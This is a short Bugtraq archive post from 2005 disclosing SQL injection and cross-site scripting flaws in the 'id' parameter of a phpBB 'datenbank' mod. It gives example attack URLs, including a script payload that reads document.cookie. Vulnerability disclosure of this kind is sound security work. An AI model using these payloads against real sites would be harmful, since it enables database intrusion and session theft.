Bugtraq mailing list archives
phpBB datenbank mod has XSS/SQL Injection in the id variable
From: tom cruise <the.n3t () gmail com>
Date: 16 Apr 2005 08:30:46 -0000
vulnerable mod: datenbank explaination: you can pass SQL Injection / Cross Site Scripting (Commands) in the id variable inside the mod.php (mod-datenbank) exploit: http://[target]/phpBB/moddb/mod.php?id='[SQL Injection] http://[target]/phpBB/moddb/mod.php?id='><script>alert(document.cookie) </script> this bugs discovered by : neO SGT SecurityGurus Team www.securitygurus.net
Current thread:
- phpBB datenbank mod has XSS/SQL Injection in the id variable tom cruise (Apr 16)